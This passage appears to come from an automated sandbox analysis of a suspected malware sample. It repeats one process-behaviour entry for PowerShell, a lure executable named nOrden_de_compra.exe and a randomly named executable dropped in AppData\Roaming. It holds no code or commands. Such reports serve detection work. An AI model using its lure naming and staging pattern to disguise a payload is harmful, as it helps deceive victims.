                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
